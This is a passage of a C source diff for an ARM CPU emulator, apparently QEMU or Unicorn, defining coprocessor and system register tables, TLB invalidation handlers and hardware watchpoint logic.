omap_threadid_write }, + { "TI925T_STATUS", 15,15,8, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, 0, + NULL, arm_cp_read_zero, omap_wfi_write, }, + /* TODO: Peripheral port remap register: + * On OMAP2 mcr p15, 0, rn, c15, c2, 4 sets up the interrupt controller + * base address at $rn & ~0xfff and map size of 0x200 << ($rn & 0xfff), + * when MMU is off. + */ + { "OMAP_CACHEMAINT", 15,7,CP_ANY, 0,0,CP_ANY, 0, + ARM_CP_OVERRIDE | ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, omap_cachemaint_write }, + { "C9", 15,9,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_OVERRIDE, PL1_RW, NULL, 0, 0, }, + REGINFO_SENTINEL +}; + +static void xscale_cpar_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c15_cpar = value & 0x3fff; +} + +static const ARMCPRegInfo xscale_cp_reginfo[] = { + { "XSCALE_CPAR", 15,15,1, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_cpar), + NULL, NULL, xscale_cpar_write, }, + { "XSCALE_AUXCR", 15,1,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c1_xscaleauxcr), }, + /* XScale specific cache-lockdown: since we have no cache we NOP these + * and hope the guest does not really rely on cache behaviour. + */ + { "XSCALE_LOCK_ICACHE_LINE", 15,9,1, 0,0,0, 0, + ARM_CP_NOP, PL1_W }, + { "XSCALE_UNLOCK_ICACHE", 15,9,1, 0,0,1, 0, + ARM_CP_NOP, PL1_W, }, + { "XSCALE_DCACHE_LOCK", 15,9,2, 0,0,0, 0, + ARM_CP_NOP, PL1_RW }, + { "XSCALE_UNLOCK_DCACHE", 15,9,2, 0,0,1, 0, + ARM_CP_NOP, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo dummy_c15_cp_reginfo[] = { + /* RAZ/WI the whole crn=15 space, when we don't have a more specific + * implementation of this implementation-defined space. + * Ideally this should eventually disappear in favour of actually + * implementing the correct behaviour for all cores. + */ + { "C15_IMPDEF", 15,15,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE | ARM_CP_OVERRIDE, PL1_RW, NULL, 0 }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo cache_dirty_status_cp_reginfo[] = { + /* Cache status: RAZ because we have no cache so it's always clean */ + { "CDSR", 15,7,10, 0,0,6, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL1_R, NULL, 0 }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo cache_block_ops_cp_reginfo[] = { + /* We never have a a block transfer operation in progress */ + { "BXSR", 15,7,12, 0,0,4, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL0_R, NULL, 0 }, + /* The cache ops themselves: these all NOP for QEMU */ + { "IICR", 15, 0,5, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL1_W }, + { "IDCR", 15, 0,6, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL1_W, }, + { "CDCR", 15, 0,12, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL0_W, }, + { "PIR", 15, 0,12, 0,1, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL0_W, }, + { "PDR", 15, 0,12, 0,2, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL0_W, }, + { "CIDCR", 15, 0,14, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo cache_test_clean_cp_reginfo[] = { + /* The cache test-and-clean instructions always return (1 << 30) + * to indicate that there are no dirty cache lines. + */ + { "TC_DCACHE", 15,7,10, 0,0,3, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL0_R, NULL, (1 << 30) }, + { "TCI_DCACHE", 15,7,14, 0,0,3, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL0_R, NULL, (1 << 30) }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo strongarm_cp_reginfo[] = { + /* Ignore ReadBuffer accesses */ + { "C9_READBUFFER", 15,9,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_OVERRIDE | ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, }, + REGINFO_SENTINEL +}; + +static uint64_t mpidr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + uint32_t mpidr = cs->cpu_index; + /* We don't support setting cluster ID ([8..11]) (known as Aff1 + * in later ARM ARM versions), or any of the higher affinity level fields, + * so these bits always RAZ. + */ + if (arm_feature(env, ARM_FEATURE_V7MP)) { + mpidr |= (1U << 31); + /* Cores which are uniprocessor (non-coherent) + * but still implement the MP extensions set + * bit 30. (For instance, A9UP.) However we do + * not currently model any of those cores. + */ + } + return mpidr; +} + +static const ARMCPRegInfo mpidr_cp_reginfo[] = { + { "MPIDR", 0,0,0, 3,0,5, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, 0, + NULL, mpidr_read, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo lpae_cp_reginfo[] = { + /* NOP AMAIR0/1: the override is because these clash with the rather + * broadly specified TLB_LOCKDOWN entry in the generic cp_reginfo. + */ + { "AMAIR0", 0,10,3, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST | ARM_CP_OVERRIDE, PL1_RW, NULL, 0 }, + /* AMAIR1 is mapped to AMAIR_EL1[63:32] */ + { "AMAIR1", 15,10,3, 0,0,1, 0, + ARM_CP_CONST | ARM_CP_OVERRIDE, PL1_RW, NULL, 0 }, + { "PAR", 15, 0,7, 0,0, 0, 0, + ARM_CP_64BIT, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.par_el1), }, + { "TTBR0", 15, 0,2, 0,0, 0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr0_el1), + NULL, NULL, vmsa_ttbr_write, NULL,NULL, arm_cp_reset_ignore }, + { "TTBR1", 15, 0,2, 0,1, 0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr1_el1), + NULL, NULL, vmsa_ttbr_write, NULL,NULL, arm_cp_reset_ignore }, + REGINFO_SENTINEL +}; + +static uint64_t aa64_fpcr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return vfp_get_fpcr(env); +} + +static void aa64_fpcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + vfp_set_fpcr(env, value); +} + +static uint64_t aa64_fpsr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return vfp_get_fpsr(env); +} + +static void aa64_fpsr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + vfp_set_fpsr(env, value); +} + +static CPAccessResult aa64_daif_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UMA)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static void aa64_daif_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->daif = value & PSTATE_DAIF; +} + +static CPAccessResult aa64_cacheop_access(CPUARMState *env, + const ARMCPRegInfo *ri) +{ + /* Cache invalidate/clean: NOP, but EL0 must UNDEF unless + * SCTLR_EL1.UCI is set. + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UCI)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +/* See: D4.7.2 TLB maintenance requirements and the TLB maintenance instructions + * Page D4-1736 (DDI0487A.b) + */ + +static void tlbi_aa64_va_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by VA (AArch64 version) */ + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t pageaddr = sextract64(value << 12, 0, 56); + + tlb_flush_page(CPU(cpu), pageaddr); +} + +static void tlbi_aa64_vaa_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by VA, all ASIDs (AArch64 version) */ + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t pageaddr = sextract64(value << 12, 0, 56); + + tlb_flush_page(CPU(cpu), pageaddr); +} + +static void tlbi_aa64_asid_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by ASID (AArch64 version) */ + ARMCPU *cpu = arm_env_get_cpu(env); + int asid = extract64(value, 48, 16); + tlb_flush(CPU(cpu), asid == 0); +} + +static void tlbi_aa64_va_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //uint64_t pageaddr = sextract64(value << 12, 0, 56); + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, pageaddr); +} + +static void tlbi_aa64_vaa_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //uint64_t pageaddr = sextract64(value << 12, 0, 56); + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, pageaddr); +} + +static void tlbi_aa64_asid_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //int asid = extract64(value, 48, 16); + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, asid == 0); +} + +static CPAccessResult aa64_zva_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* We don't implement EL2, so the only control on DC ZVA is the + * bit in the SCTLR which can prohibit access for EL0. + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_DZE)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static uint64_t aa64_dczid_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int dzp_bit = 1 << 4; + + /* DZP indicates whether DC ZVA access is allowed */ + if (aa64_zva_access(env, NULL) == CP_ACCESS_OK) { + dzp_bit = 0; + } + return cpu->dcz_blocksize | dzp_bit; +} + +static CPAccessResult sp_el0_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (!(env->pstate & PSTATE_SP)) { + /* Access to SP_EL0 is undefined if it's being used as + * the stack pointer. + */ + return CP_ACCESS_TRAP_UNCATEGORIZED; + } + return CP_ACCESS_OK; +} + +static uint64_t spsel_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return env->pstate & PSTATE_SP; +} + +static void spsel_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t val) +{ + update_spsel(env, val); +} + +static const ARMCPRegInfo v8_cp_reginfo[] = { + /* Minimal set of EL0-visible registers. This will need to be expanded + * significantly for system emulation of AArch64 CPUs. + */ + { "NZCV", 0,4,2, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_NZCV, PL0_RW, }, + { "DAIF", 0,4,2, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetof(CPUARMState, daif), + aa64_daif_access, NULL, aa64_daif_write, NULL,NULL, arm_cp_reset_ignore }, + { "FPCR", 0,4,4, 3,3,0, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, 0, + NULL, aa64_fpcr_read, aa64_fpcr_write }, + { "FPSR", 0,4,4, 3,3,1, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, 0, + NULL, aa64_fpsr_read, aa64_fpsr_write }, + { "DCZID_EL0", 0,0,0, 3,3,7, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL0_R, NULL, 0, 0, + NULL, aa64_dczid_read }, + { "DC_ZVA", 0,7,4, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_DC_ZVA, PL0_W, NULL, 0, 0, +#ifndef CONFIG_USER_ONLY + /* Avoid overhead of an access check that always passes in user-mode */ + aa64_zva_access, +#endif + }, + { "CURRENTEL", 0,4,2, 3,0,2, ARM_CP_STATE_AA64, + ARM_CP_CURRENTEL, PL1_R, }, + /* Cache ops: all NOPs since we don't emulate caches */ + { "IC_IALLUIS", 0,7,1, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "IC_IALLU", 0,7,5, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "IC_IVAU", 0,7,5, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_IVAC", 0,7,6, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "DC_ISW", 0,7,6, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "DC_CVAC", 0,7,10, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_CSW", 0,7,10, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "DC_CVAU", 0,7,11, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_CIVAC", 0,7,14, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_CISW", 0,7,14, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + /* TLBI operations */ + { "TLBI_VMALLE1IS", 0,8,3, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_is_write }, + { "TLBI_VAE1IS", 0,8,3, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_is_write }, + { "TLBI_ASIDE1IS", 0,8,3, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_asid_is_write }, + { "TLBI_VAAE1IS", 0,8,3, 1,0,3, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_is_write }, + { "TLBI_VALE1IS", 0,8,3, 1,0,5, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_is_write }, + { "TLBI_VAALE1IS", 0,8,3, 1,0,7, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_is_write }, + { "TLBI_VMALLE1", 0,8,7, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "TLBI_VAE1", 0,8,7, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_write }, + { "TLBI_ASIDE1", 0,8,7, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_asid_write }, + { "TLBI_VAAE1", 0,8,7, 1,0,3, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_write }, + { "TLBI_VALE1", 0,8,7, 1,0,5, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_write }, + { "TLBI_VAALE1", 0,8,7, 1,0,7, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_write }, +#ifndef CONFIG_USER_ONLY + /* 64 bit address translation operations */ + { "AT_S1E1R", 0,7,8, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, + { "AT_S1E1W", 0,7,8, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, + { "AT_S1E0R", 0,7,8, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, + { "AT_S1E0W", 0,7,8, 1,0,3, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, +#endif + /* TLB invalidate last level of translation table walk */ + { "TLBIMVALIS", 15,8,3, 0,0,5, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_is_write }, + { "TLBIMVAALIS", 15,8,3, 0,0,7, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_is_write }, + { "TLBIMVAL", 15,8,7, 0,0,5, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "TLBIMVAAL", 15,8,7, 0,0,7, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_write }, + /* 32 bit cache operations */ + { "ICIALLUIS", 15,7,1, 0,0,0, 0, + ARM_CP_NOP, PL1_W }, + { "BPIALLUIS", 15,7,1, 0,0,6, 0, + ARM_CP_NOP, PL1_W }, + { "ICIALLU", 15,7,5, 0,0,0, 0, + ARM_CP_NOP, PL1_W }, + { "ICIMVAU", 15,7,5, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "BPIALL", 15,7,5, 0,0,6, 0, + ARM_CP_NOP, PL1_W }, + { "BPIMVA", 15,7,5, 0,0,7, 0, + ARM_CP_NOP, PL1_W }, + { "DCIMVAC", 15,7,6, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCISW", 15,7,6, 0,0,2, 0, + ARM_CP_NOP, PL1_W }, + { "DCCMVAC", 15,7,10, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCCSW", 15,7,10, 0,0,2, 0, + ARM_CP_NOP, PL1_W }, + { "DCCMVAU", 15,7,11, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCCIMVAC", 15,7,14, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCCISW", 15,7,14, 0,0,2, 0, + ARM_CP_NOP, PL1_W }, + /* MMU Domain access control / MPU write buffer control */ + { "DACR", 15,3,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c3), + NULL, NULL,dacr_write, NULL,raw_write, }, + { "ELR_EL1", 0,4,0, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, elr_el[1]) }, + { "SPSR_EL1", 0,4,0, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, banked_spsr[0]) }, + /* We rely on the access checks not allowing the guest to write to the + * state field when SPSel indicates that it's being used as the stack + * pointer. + */ + { "SP_EL0", 0,4,1, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, sp_el[0]), + sp_el0_access, }, + { "SPSel", 0,4,2, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, 0, + NULL, spsel_read, spsel_write }, + REGINFO_SENTINEL +}; + +/* Used to describe the behaviour of EL2 regs when EL2 does not exist. */ +static const ARMCPRegInfo v8_el3_no_el2_cp_reginfo[] = { + { "VBAR_EL2", 0,12,0, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, 0, + NULL, arm_cp_read_zero, arm_cp_write_ignore }, + { "HCR_EL2", 0,1,1, 3,4,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, 0, + NULL, arm_cp_read_zero, arm_cp_write_ignore }, + REGINFO_SENTINEL +}; + +static void hcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t valid_mask = HCR_MASK; + + if (arm_feature(env, ARM_FEATURE_EL3)) { + valid_mask &= ~HCR_HCD; + } else { + valid_mask &= ~HCR_TSC; + } + + /* Clear RES0 bits. */ + value &= valid_mask; + + /* These bits change the MMU setup: + * HCR_VM enables stage 2 translation + * HCR_PTW forbids certain page-table setups + * HCR_DC Disables stage1 and enables stage2 translation + */ + if ((raw_read(env, ri) ^ value) & (HCR_VM | HCR_PTW | HCR_DC)) { + tlb_flush(CPU(cpu), 1); + } + raw_write(env, ri, value); +} + +static const ARMCPRegInfo v8_el2_cp_reginfo[] = { + { "HCR_EL2", 0,1,1, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.hcr_el2), + NULL, NULL, hcr_write }, + { "ELR_EL2", 0,4,0, 3,4,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, offsetof(CPUARMState, elr_el[2]) }, + { "ESR_EL2", 0,5,2, 3,4,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.esr_el[2]) }, + { "FAR_EL2", 0,6,0, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.far_el[2]) }, + { "SPSR_EL2", 0,4,0, 3,4,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, offsetof(CPUARMState, banked_spsr[6]) }, + { "VBAR_EL2", 0,12,0, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.vbar_el[2]), + NULL, NULL, vbar_write, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo v8_el3_cp_reginfo[] = { + { "ELR_EL3", 0,4,0, 3,6,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, elr_el[3]) }, + { "ESR_EL3", 0,5,2, 3,6,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.esr_el[3]) }, + { "FAR_EL3", 0,6,0, 3,6,0, ARM_CP_STATE_AA64, + 0, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.far_el[3]) }, + { "SPSR_EL3", 0,4,0, 3,6,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, banked_spsr[7]) }, + { "VBAR_EL3", 0,12,0, 3,6,0, ARM_CP_STATE_AA64, + 0, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.vbar_el[3]), + NULL, NULL, vbar_write, }, + { "SCR_EL3", 0,1,1, 3,6,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.scr_el3), + NULL, NULL, scr_write }, + REGINFO_SENTINEL +}; + +static void sctlr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (raw_read(env, ri) == value) { + /* Skip the TLB flush if nothing actually changed; Linux likes + * to do a lot of pointless SCTLR writes. + */ + return; + } + + raw_write(env, ri, value); + /* ??? Lots of these bits are not implemented. */ + /* This may enable/disable the MMU, so do a TLB flush. */ + tlb_flush(CPU(cpu), 1); +} + +static CPAccessResult ctr_el0_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Only accessible in EL0 if SCTLR.UCT is set (and only in AArch64, + * but the AArch32 CTR has its own reginfo struct) + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UCT)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static const ARMCPRegInfo debug_cp_reginfo[] = { + /* DBGDRAR, DBGDSAR: always RAZ since we don't implement memory mapped + * debug components. The AArch64 version of DBGDRAR is named MDRAR_EL1; + * unlike DBGDRAR it is never accessible from EL0. + * DBGDSAR is deprecated and must RAZ from v8 anyway, so it has no AArch64 + * accessor. + */ + { "DBGDRAR", 14,1,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, 0 }, + { "MDRAR_EL1", 0,1,0, 2,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DBGDSAR", 14,2,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, 0 }, + /* Monitor debug system control register; the 32-bit alias is DBGDSCRext. */ + { "MDSCR_EL1", 14,0,2, 2,0,2, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.mdscr_el1), }, + /* MDCCSR_EL0, aka DBGDSCRint. This is a read-only mirror of MDSCR_EL1. + * We don't implement the configurable EL0 access. + */ + { "MDCCSR_EL0", 14,0,1, 2,0,0, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, offsetof(CPUARMState, cp15.mdscr_el1), + NULL,NULL,NULL,NULL,NULL, arm_cp_reset_ignore }, + /* We define a dummy WI OSLAR_EL1, because Linux writes to it. */ + { "OSLAR_EL1", 14,1,0, 2,0,4, ARM_CP_STATE_BOTH, + ARM_CP_NOP, PL1_W, }, + /* Dummy OSDLR_EL1: 32-bit Linux will read this */ + { "OSDLR_EL1", 14,1,3, 2,0,4, ARM_CP_STATE_BOTH, + ARM_CP_NOP, PL1_RW, }, + /* Dummy DBGVCR: Linux wants to clear this on startup, but we don't + * implement vector catch debug events yet. + */ + { "DBGVCR", 14,0,7, 0,0,0, 0, + ARM_CP_NOP, PL1_RW, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo debug_lpae_cp_reginfo[] = { + /* 64 bit access versions of the (dummy) debug registers */ + { "DBGDRAR", 14, 0,1, 0,0, 0, 0, + ARM_CP_CONST|ARM_CP_64BIT, PL0_R, NULL, 0 }, + { "DBGDSAR", 14, 0,2, 0,0, 0, 0, + ARM_CP_CONST|ARM_CP_64BIT, PL0_R, NULL, 0 }, + REGINFO_SENTINEL +}; + +void hw_watchpoint_update(ARMCPU *cpu, int n) +{ + CPUARMState *env = &cpu->env; + vaddr len = 0; + vaddr wvr = env->cp15.dbgwvr[n]; + uint64_t wcr = env->cp15.dbgwcr[n]; + int mask; + int flags = BP_CPU | BP_STOP_BEFORE_ACCESS; + + if (env->cpu_watchpoint[n]) { + cpu_watchpoint_remove_by_ref(CPU(cpu), env->cpu_watchpoint[n]); + env->cpu_watchpoint[n] = NULL; + } + + if (!extract64(wcr, 0, 1)) { + /* E bit clear : watchpoint disabled */ + return; + } + + switch (extract64(wcr, 3, 2)) { + case 0: + /* LSC 00 is reserved and must behave as if the wp is disabled */ + return; + case 1: + flags |= BP_MEM_READ; + break; + case 2: + flags |= BP_MEM_WRITE; + break; + case 3: + flags |= BP_MEM_ACCESS; + break; + } + + /* Attempts to use both MASK and BAS fields simultaneously are + * CONSTRAINED UNPREDICTABLE; we opt to ignore BAS in this case, + * thus generating a watchpoint for every byte in the masked region. + */ + mask = extract64(wcr, 24, 4); + if (mask == 1 || mask == 2) { + /* Reserved values of MASK; we must act as if the mask value was + * some non-reserved value, or as if the watchpoint were disabled. + * We choose the latter. + */ + return; + } else if (mask) { + /* Watchpoint covers an aligned area up to 2GB in size */ + len = 1ULL << mask; + /* If masked bits in WVR are not zero it's CONSTRAINED UNPREDICTABLE + * whether the watchpoint fires when the unmasked bits match; we opt + * to generate the exceptions. + */ + wvr &= ~(len - 1); + } else { + /* Watchpoint covers bytes defined by the byte address select bits */ + int bas = extract64(wcr, 5, 8); + int basstart; + + if (bas == 0) { + /* This must act as if the watchpoint is disabled */ + return; + } + + if (extract64(wvr, 2, 1)) { + /* Deprecated case of an only 4-aligned address. BAS[7:4] are + * ignored, and BAS[3:0] define which bytes to watch. + */ + bas &= 0xf; + } + /* The BAS bits are supposed to be programmed to indicate a contiguous + * range of bytes. Otherwise it is CONSTRAINED UNPREDICTABLE whether + * we fire for each byte in the word/doubleword addressed by the WVR. + * We choose to ignore any non-zero bits after the first range of 1s. + */ + basstart = ctz32(bas); + len = cto32(bas >> (basstart & 0x1f)); + wvr += basstart; + } + + cpu_watchpoint_insert(CPU(cpu), wvr, len, flags, + &env->cpu_watchpoint[n]); +} + +void hw_watchpoint_update_all(ARMCPU *cpu) +{ + int i; + CPUARMState *env = &cpu->env; + + /* Completely clear out existing QEMU watchpoints and our array, to + * avoid possible stale entries following migration load. + */ + cpu_watchpoint_remove_all(CPU(cpu), BP_CPU); + memset(env->cpu_watchpoint, 0, sizeof(env->cpu_watchpoint)); + + for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_watchpoint); i++) { + hw_watchpoint_update(cpu, i); + } +} + +static void dbgwvr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = 